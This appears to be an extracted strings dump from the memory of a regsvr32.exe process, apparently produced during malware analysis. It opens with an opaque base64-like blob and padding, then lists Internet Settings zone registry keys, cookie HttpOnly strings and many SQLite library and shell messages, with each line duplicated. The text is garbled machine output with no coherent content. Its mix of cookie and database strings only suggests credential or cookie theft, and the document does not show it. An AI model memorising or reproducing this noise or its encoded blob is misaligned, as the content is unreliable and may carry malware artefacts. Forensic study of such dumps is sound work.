suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1 qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85 Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

regsvr32.exe_3264_rwx_009B0000_0006C000:

t8It.IIt#

t8It.IIt#

.FGyO

.FGyO

FTPj

FTPj

YPSSSh

YPSSSh

9t$Lt.VV

9t$Lt.VV

,4,56,789

,4,56,789

GetProcessWindowStation

GetProcessWindowStation

3.7.13

3.7.13

SQLite format 3

SQLite format 3

CREATE TABLE sqlite_master(

CREATE TABLE sqlite_master(

sql text

sql text

CREATE TEMP TABLE sqlite_temp_master(

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\

-cmd command run "command" before reading stdin

-cmd command run "command" before reading stdin

-echo print commands before execution

-echo print commands before execution

-version show SQLite version

-version show SQLite version

%a, %d-%b-%Y %H:%M:%S GMT

%a, %d-%b-%Y %H:%M:%S GMT

isHttpOnly

isHttpOnly

HttpOnly=YES

HttpOnly=YES

HttpOnly=NO

HttpOnly=NO

SQLITE_

SQLITE_

d-d-d d:d:d

d-d-d d:d:d

d:d:d

d:d:d

d-d-d

d-d-d

failed to allocate %u bytes of memory

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

failed memory resize %u to %u bytes

922337203685477580

922337203685477580

API call with %s database connection pointer

API call with %s database connection pointer

RowKey

RowKey

GetProcessHeap

GetProcessHeap

OsError 0x%x (%u)

OsError 0x%x (%u)

os_win.c:%d: (%d) %s(%s) - %s

os_win.c:%d: (%d) %s(%s) - %s

delayed %dms for lock/sharing conflict

delayed %dms for lock/sharing conflict

%s-shm

%s-shm

%s\etilqs_

%s\etilqs_

%s\%s

%s\%s

Recovered %d frames from WAL file %s

Recovered %d frames from WAL file %s

cannot limit WAL size: %s

cannot limit WAL size: %s

invalid page number %d

invalid page number %d

2nd reference to page %d

2nd reference to page %d

Failed to read ptrmap key=%d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

%d of %d pages missing from overflow list starting at %d

failed to get page %d

failed to get page %d

freelist leaf count too big on page %d

freelist leaf count too big on page %d

Page %d:

Page %d:

unable to get the page. error code=%d

unable to get the page. error code=%d

btreeInitPage() returns error code %d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On tree page %d cell %d:

On page %d at right child:

On page %d at right child:

Corruption detected in cell %d on page %d

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Page %d is never used

Pointer map page %d is referenced

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

Outstanding page count goes from %d to %d during this analysis

unknown database %s

unknown database %s

keyinfo(%d

keyinfo(%d

%s(%d)

%s(%d)

%s-mjXXXXXX9XXz

%s-mjXXXXXX9XXz

MJ delete: %s

MJ delete: %s

MJ collide: %s

MJ collide: %s

-mjX9X

-mjX9X

foreign key constraint failed

foreign key constraint failed

unable to use function %s in the requested context

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

bind on a busy prepared statement: [%s]

zeroblob(%d)

zeroblob(%d)

abort at %d in [%s]: %s

abort at %d in [%s]: %s

constraint failed at %d in [%s]

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

cannot open savepoint - SQL statements in progress

no such savepoint: %s

no such savepoint: %s

cannot release savepoint - SQL statements in progress

cannot release savepoint - SQL statements in progress

cannot commit transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_temp_master

sqlite_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

cannot change %s wal mode from within a transaction

database table is locked: %s

database table is locked: %s

statement aborts at %d: [%s] %s

statement aborts at %d: [%s] %s

cannot open value of type %s

cannot open value of type %s

cannot open virtual table: %s

cannot open virtual table: %s

cannot open view: %s

cannot open view: %s

no such column: "%s"

no such column: "%s"

foreign key

foreign key

indexed

indexed

cannot open %s column for writing

cannot open %s column for writing

misuse of aliased aggregate %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s.%s

%s: %s.%s

%s: %s.%s

%s: %s

%s: %s

not authorized to use function: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

variable number must be between ?1 and ?%d

too many SQL variables

too many SQL variables

too many columns in %s

too many columns in %s

EXECUTE %s%s SUBQUERY %d

EXECUTE %s%s SUBQUERY %d

misuse of aggregate: %s()

misuse of aggregate: %s()

%.*s"%w"%s

%.*s"%w"%s

%s%.*s"%w"

%s%.*s"%w"

sqlite_rename_table

sqlite_rename_table

sqlite_rename_trigger

sqlite_rename_trigger

sqlite_rename_parent

sqlite_rename_parent

%s OR name=%Q

%s OR name=%Q

type='trigger' AND (%s)

type='trigger' AND (%s)

sqlite_

sqlite_

table %s may not be altered

table %s may not be altered

there is already another table or index with this name: %s

there is already another table or index with this name: %s

view %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

sqlite_sequence

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

sqlite_altertab_%s

sqlite_stat1

sqlite_stat1

CREATE TABLE %Q.%s(%s)

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE %s=%Q

DELETE FROM %Q.%s WHERE %s=%Q

SELECT tbl,idx,stat FROM %Q.sqlite_stat1

SELECT tbl,idx,stat FROM %Q.sqlite_stat1

invalid name: "%s"

invalid name: "%s"

too many attached databases - max %d

too many attached databases - max %d

database %s is already in use

database %s is already in use

unable to open database: %s

unable to open database: %s

no such database: %s

no such database: %s

cannot detach database %s

cannot detach database %s

database %s is locked

database %s is locked

sqlite_detach

sqlite_detach

sqlite_attach

sqlite_attach

%s %T cannot reference objects in database %s

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

object name reserved for internal use: %s

there is already an index named %s

there is already an index named %s

too many columns on %s

too many columns on %s

duplicate column name: %s

duplicate column name: %s

default value of column [%s] is not constant

default value of column [%s] is not constant

table "%s" has more than one primary key

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

no such collation sequence: %s

CREATE %s %.*s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

sqlite_stat%d

sqlite_stat%d

DELETE FROM %Q.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

sqlite_stat

sqlite_stat

table %s may not be dropped

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

use DROP VIEW to delete view %s

foreign key on %s should reference only one column of table %T

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

unknown column "%s" in foreign key definition

indexed columns are not unique

indexed columns are not unique

table %s may not be indexed

table %s may not be indexed

views may not be indexed

views may not be indexed

virtual tables may not be indexed

virtual tables may not be indexed

there is already a table named %s

there is already a table named %s

index %s already exists

index %s already exists

sqlite_autoindex_%s_%d

sqlite_autoindex_%s_%d

table %s has no column named %s

table %s has no column named %s

CREATE%s INDEX %.*s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q AND type='index'

DELETE FROM %Q.%s WHERE name=%Q AND type='index'

a JOIN clause is required before %s

a JOIN clause is required before %s

unable to identify the object to be reindexed

unable to identify the object to be reindexed

table %s may not be modified

table %s may not be modified

cannot modify %s because it is a view

cannot modify %s because it is a view

sqlite_version

sqlite_version

sqlite_source_id

sqlite_source_id

sqlite_log

sqlite_log

sqlite_compileoption_used

sqlite_compileoption_used

sqlite_compileoption_get

sqlite_compileoption_get

foreign key mismatch

foreign key mismatch

table %S has %d columns but %d values were supplied

table %S has %d columns but %d values were supplied

%d values for %d columns

%d values for %d columns

table %S has no column named %s

table %S has no column named %s

%s.%s may not be NULL

%s.%s may not be NULL

constraint %s failed

constraint %s failed

PRIMARY KEY must be unique

PRIMARY KEY must be unique

sqlite3_extension_init

sqlite3_extension_init

unable to open shared library [%s]

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

error during initialization: %s

automatic extension loading failed: %s

automatic extension loading failed: %s

foreign_keys

foreign_keys

foreign_key_list

foreign_key_list

*** in database %s ***

*** in database %s ***

unsupported encoding: %s

unsupported encoding: %s

malformed database schema (%s)

malformed database schema (%s)

%s - %s

%s - %s

unsupported file format

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

cannot join using column %s - column not present in both tables

USE TEMP B-TREE FOR %s

USE TEMP B-TREE FOR %s

COMPOUND SUBQUERIES %d AND %d %s(%s)

COMPOUND SUBQUERIES %d AND %d %s(%s)

%s.%s

%s.%s

%s:%d

%s:%d

ORDER BY clause should come after %s not before

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

no such index: %s

sqlite_subquery_%p_

sqlite_subquery_%p_

no such table: %s

no such table: %s

SCAN TABLE %s %s%s(~%d rows)

SCAN TABLE %s %s%s(~%d rows)

sqlite3_get_table() called with two or more incompatible queries

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

no such trigger: %S

-- TRIGGER %s

-- TRIGGER %s

no such column: %s

no such column: %s

cannot VACUUM - SQL statements in progress

cannot VACUUM - SQL statements in progress

PRAGMA vacuum_db.synchronous=OFF

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor failed: %s

vtable constructor did not declare schema: %s

vtable constructor did not declare schema: %s

no such module: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

table %s: xBestIndex returned an invalid plan

%s SUBQUERY %d

%s SUBQUERY %d

%s TABLE %s

%s TABLE %s

%s AS %s

%s AS %s

%s USING %s%sINDEX%s%s%s

%s USING %s%sINDEX%s%s%s

%s USING INTEGER PRIMARY KEY

%s USING INTEGER PRIMARY KEY

%s (rowid=?)

%s (rowid=?)

%s (rowid>? AND rowid)

%s (rowid>? AND rowid)

%s (rowid>?)

%s (rowid>?)

%s (rowid)

%s (rowid)

%s VIRTUAL TABLE INDEX %d:%s

%s VIRTUAL TABLE INDEX %d:%s

%s (~%lld rows)

%s (~%lld rows)

at most %d tables in a join

at most %d tables in a join

cannot use index: %s

cannot use index: %s

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unable to close due to unfinished backup operation

SQL logic error or missing database

SQL logic error or missing database

unknown operation

unknown operation

large file support is disabled

large file support is disabled

unknown database: %s

unknown database: %s

no such %s mode: %s

no such %s mode: %s

%s mode not allowed: %s

%s mode not allowed: %s

no such vfs: %s

no such vfs: %s

database corruption at line %d of [%.10s]

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

cannot open file at line %d of [%.10s]

CPU Time: user %f sys %f

CPU Time: user %f sys %f

(%d) %s

(%d) %s

%*s = %s

%*s = %s

%-*.*s%s

%-*.*s%s

INSERT INTO %s VALUES(

INSERT INTO %s VALUES(

%sNULL

%sNULL

/**** ERROR: (%d) %s *****/

/**** ERROR: (%d) %s *****/

Memory Used: %d (max %d) bytes

Memory Used: %d (max %d) bytes

Number of Outstanding Allocations: %d (max %d)

Number of Outstanding Allocations: %d (max %d)

Number of Pcache Overflow Bytes: %d (max %d) bytes

Number of Pcache Overflow Bytes: %d (max %d) bytes

Number of Scratch Overflow Bytes: %d (max %d) bytes

Number of Scratch Overflow Bytes: %d (max %d) bytes

Largest Allocation: %d bytes

Largest Allocation: %d bytes

Largest Pcache Allocation: %d bytes

Largest Pcache Allocation: %d bytes

Largest Scratch Allocation: %d bytes

Largest Scratch Allocation: %d bytes

Lookaside Slots Used: %d (max %d)

Lookaside Slots Used: %d (max %d)

Successful lookaside attempts: %d

Successful lookaside attempts: %d

Lookaside failures due to size: %d

Lookaside failures due to size: %d

Lookaside failures due to OOM: %d

Lookaside failures due to OOM: %d

Pager Heap Usage: %d bytes

Pager Heap Usage: %d bytes

Page cache hits: %d

Page cache hits: %d

Page cache misses: %d

Page cache misses: %d

Page cache writes: %d

Page cache writes: %d

Schema Heap Usage: %d bytes

Schema Heap Usage: %d bytes

Statement Heap/Lookaside Usage: %d bytes

Statement Heap/Lookaside Usage: %d bytes

Fullscan Steps: %d

Fullscan Steps: %d

Sort Operations: %d

Sort Operations: %d

Autoindex Inserts: %d

Autoindex Inserts: %d

DELETE FROM sqlite_sequence;

DELETE FROM sqlite_sequence;

ANALYZE sqlite_master;

ANALYZE sqlite_master;

INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');

INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');

/****** %s ******/

/****** %s ******/

%s ORDER BY rowid DESC

%s ORDER BY rowid DESC

/****** ERROR: %s ******/

/****** ERROR: %s ******/

.backup ?DB? FILE Backup DB (default "main") to FILE

.backup ?DB? FILE Backup DB (default "main") to FILE

.bail ON|OFF Stop after hitting an error. Default OFF

.bail ON|OFF Stop after hitting an error. Default OFF

.databases List names and files of attached databases

.databases List names and files of attached databases

.dump ?TABLE? ... Dump the database in an SQL text format

.dump ?TABLE? ... Dump the database in an SQL text format

.echo ON|OFF Turn command echo on or off

.echo ON|OFF Turn command echo on or off

.exit Exit this program

.exit Exit this program

.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.

.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.

.header(s) ON|OFF Turn display of headers on or off

.header(s) ON|OFF Turn display of headers on or off

.help Show this message

.help Show this message

.import FILE TABLE Import data from FILE into TABLE

.import FILE TABLE Import data from FILE into TABLE

.indices ?TABLE? Show names of all indices

.indices ?TABLE? Show names of all indices

.load FILE ?ENTRY? Load an extension library

.load FILE ?ENTRY? Load an extension library

.log FILE|off Turn logging on or off. FILE can be stderr/stdout

.log FILE|off Turn logging on or off. FILE can be stderr/stdout

.mode MODE ?TABLE? Set output mode where MODE is one of:

.mode MODE ?TABLE? Set output mode where MODE is one of:

column Left-aligned columns. (See .width)

column Left-aligned columns. (See .width)

insert SQL insert statements for TABLE

insert SQL insert statements for TABLE

list Values delimited by .separator string

list Values delimited by .separator string

.nullvalue STRING Print STRING in place of NULL values

.nullvalue STRING Print STRING in place of NULL values

.output FILENAME Send output to FILENAME

.output FILENAME Send output to FILENAME

.output stdout Send output to the screen

.output stdout Send output to the screen

